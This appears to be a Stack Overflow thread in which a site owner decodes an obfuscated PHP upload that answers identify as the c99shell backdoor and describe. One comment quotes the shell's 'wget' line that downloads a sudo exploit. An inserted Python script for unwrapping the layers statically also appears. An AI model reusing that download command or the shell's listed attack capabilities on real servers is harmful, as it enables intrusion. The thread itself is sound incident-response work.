views: 717
answers: 5

WARNING: This is a possible exploit. Do not run directly on your server if you're not sure what to do with this.

http://pastehtml.com/view/1b1m2r6.txt

I believe this was uploaded via an insecure upload script. How do I decode and uncompress this code? Running it in the browser might execute it as a shell script, open up a port or something.

I can do a base64 decode online but I couldn't really decompress it.

+24  A: 

So there's a string. It's gzipped and base64 encoded, and the code decodes the base64 and then uncompresses it.

When that's done, I am left with this:

<? eval(base64_decode('...')); ?>

Another layer of base64, which is 720440 bytes long.

Now, base64 decoding that, we have 506961 bytes of exploit code.

That's here: http://azabani.com/misc/stackoverflow/3708246-exploit.txt

I'm still examining the code, and will update this answer when I have more understanding. The code is huge.

Still reading through the code, and the (very well-done) exploit allows these tools to be exposed to the hacker:

  • TCP backdoor setup
  • unauthorised shell access
  • reading of all htpasswd, htaccess, password and configuration files
  • log wiping
  • MySQL access (read, write)
  • append code to all files matching a name pattern (mass exploit)
  • RFI/LFI scanner
  • UDP flooding
  • kernel information

This is probably a professional PHP-based server-wide exploit toolkit, and seeing as it's got a nice HTML interface and the whole lot, it could be easily used by a pro hacker, or even a script kiddie.

This exploit is called c99shell (thanks Yi Jiang) and it turns out to have been quite popular, being talked about and running for a few years already. There are many results on Google for this exploit.

Delan Azabani
Wow, it's a complete backdoor setup. Though the guy who uploaded it is probably another script kiddie. It was hosted directly under our apache root directory. And a real hacker would have deleted it after setting up the backdoor.
gAMBOOKa
It's got a shell script in it, a string called $backdoor, which is written out and exec'd. The PHP then tells the user this has been done and to connect with netcat.
Ninefingers
Shit like this scares me `array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),`
gAMBOOKa
@gAMBOOKa only affects sudo 1.6.8. You do regularly update your software, right...?!! `sudo -V` to find out if this affects you.
Ninefingers
My computer. *suspense* `Sudo version 1.7.2p7` *whew* Now for my grid web server. *suspense* `Sudo version 1.6.8p7` *gasp* Oh dear...
Delan Azabani
@Ninefingers : I'm safe! Thanks for the tip.
gAMBOOKa
I am going to write to MediaTemple and see what they have to say about this.
Delan Azabani
@Delan if you have access to the shell, can you not just run apt-get/yum? Distros should distribute the latest versions?
Ninefingers
I'm on a shared grid server, so even though I have shell access, I don't have permission to update packages, etc.
Delan Azabani
Update: they've come back to me and assured me that it's no problem as my account isn't in the `sudoers` so sudo can't even be used.
Delan Azabani
`Sudo version 1.6.8p12` am I vulnerable?
jyzuz
+3  A: 

First, replace the eval with an echo to see what code it would execute if you'd let it. Send the output of that script to another file, say, test2.php. In that file, do the same trick again. Run it, and it will output the complete malicious program (it's quite a beast), ~4k lines of hacker's delight.

tdammers
You're right, why didn't I think of that?!
gAMBOOKa
+13  A: 

Looking at Delan's decoded source, it appears to be a full-fledged backdoor providing a web interface that can be used to control the server in various ways. Telling fragments from the source:

echo '<center>Are you sure you want to install an IP:Port proxy on this
website/server?<br />

or

<b>Mass Code Injection:</b><br><br>
Use this to add PHP to the end of every .php page in the directory specified.

or

echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . 
     round(($pakits*65)/1024, 2) . " MB) packets averaging ". 
     round($pakits/$exec_time, 2) . " packets per second \n";

or

if (!$fp) {echo "Can't get /etc/passwd for password-list.";}

I'd advise you to scrub that server and reinstall everything from scratch.

Michael Borgwardt
+1 from me, sound advice.
Ninefingers
+6  A: 

I know Delan Azabani has done this, but just so you actually know how he got the data out:

Just in case you're wondering how to decompress this, use `base64 -d filename > output` to parse base64 strings and `gunzip file.name.gz` to parse gzipped data.

The trick is in recognising that what you've got is base64 or gunzip and decompressing the right bits.

This way it goes absolutely nowhere near a JS parser or PHP parser.

Ninefingers
Great safety tip; never let it execute.
Delan Azabani
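The layering Delan describes (an outer gzip+base64 wrapper, then a second base64-only `eval(base64_decode(...))` layer) and the "never let it execute" approach Ninefingers recommends can be combined into a small static unwrapper. The script below is an added example, not code from the question or from any answer: it peels `eval(base64_decode(...))`, `eval(gzinflate(...))`, `eval(gzuncompress(...))` and `eval(gzdecode(...))` wrappers purely as text, so the PHP is never passed to an interpreter. The sample it works on is constructed inline around a harmless payload; the regex, function names and the three-layer sample are this example's own assumptions, not the real c99shell wrapper.

```python
"""Static unwrapping of nested eval(base64_decode(...)) / gz* PHP wrappers.

Added example (not from the original page). It only decodes text; the
decoded PHP is returned as a string and never executed.
"""
import base64
import re
import zlib

# One wrapper layer, e.g.
#   eval(base64_decode('...'));
#   eval(gzinflate(base64_decode("...")));
#   eval(gzuncompress(base64_decode('...')));
LAYER_RE = re.compile(
    r"""eval\s*\(\s*(?:(?P<decomp>gzinflate|gzuncompress|gzdecode)\s*\(\s*)?"""
    r"""base64_decode\s*\(\s*['"](?P<b64>[A-Za-z0-9+/=\s]+)['"]\s*\)"""
    r"""(?(decomp)\s*\))\s*\)\s*;?""",
    re.DOTALL,
)


def _decompress(kind, data):
    """Map PHP's decompression helpers onto zlib's window-bits conventions."""
    if kind == "gzinflate":      # PHP gzinflate: raw DEFLATE, no header
        return zlib.decompress(data, -zlib.MAX_WBITS)
    if kind == "gzuncompress":   # PHP gzuncompress: zlib stream
        return zlib.decompress(data)
    if kind == "gzdecode":       # PHP gzdecode: gzip container
        return zlib.decompress(data, 16 + zlib.MAX_WBITS)
    return data                  # no compression on this layer


def peel_once(src):
    """Return the next layer hidden inside src, or None if no wrapper is found."""
    m = LAYER_RE.search(src)
    if not m:
        return None
    raw = base64.b64decode(re.sub(r"\s+", "", m.group("b64")))
    # latin-1 keeps every byte value, so nothing is lost even if the payload
    # contains binary junk; the result is text for a human to read.
    return _decompress(m.group("decomp"), raw).decode("latin-1")


def unwrap(src, max_layers=20):
    """Peel wrappers repeatedly; returns [original, layer1, ..., final_code]."""
    layers = [src]
    for _ in range(max_layers):
        nxt = peel_once(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def layer_sizes(layers):
    """Byte length of each layer, the way the answer reports 720440 -> 506961."""
    return [len(layer.encode("latin-1")) for layer in layers]


def build_sample():
    """Constructed sample in the shape the post describes: a harmless payload,
    wrapped in base64 (inner), then raw-deflated and base64'd again (outer)."""
    payload = '<?php echo "decoded payload"; ?>'
    inner = "<? eval(base64_decode('%s')); ?>" % base64.b64encode(
        payload.encode()).decode()
    co = zlib.compressobj(wbits=-zlib.MAX_WBITS)          # raw DEFLATE == gzinflate
    compressed = co.compress(inner.encode()) + co.flush()
    outer = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(
        compressed).decode()
    return outer, inner, payload


if __name__ == "__main__":
    outer, _, _ = build_sample()
    for depth, layer in enumerate(unwrap(outer)):
        print("layer %d (%d bytes): %s" % (depth, len(layer), layer[:60]))
```

Run it on a real sample by reading the file into `src` and calling `unwrap(src)`; the last element is the code that would have been `eval`'d, which you can then read or diff against known shells. If the final layer still contains an `eval(` that the regex did not recognise (string concatenation, `str_rot13`, a custom decoder), stop there and extend the matcher rather than falling back to executing it.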
+1  A: 

This is code for a PHP shell.
To decode this:

Replace `eval("?>".` with `print(`, then run this:

php5 file.php > file2.php

Then replace eval with print and run it in the browser: http://localhost/file2.php

jcubic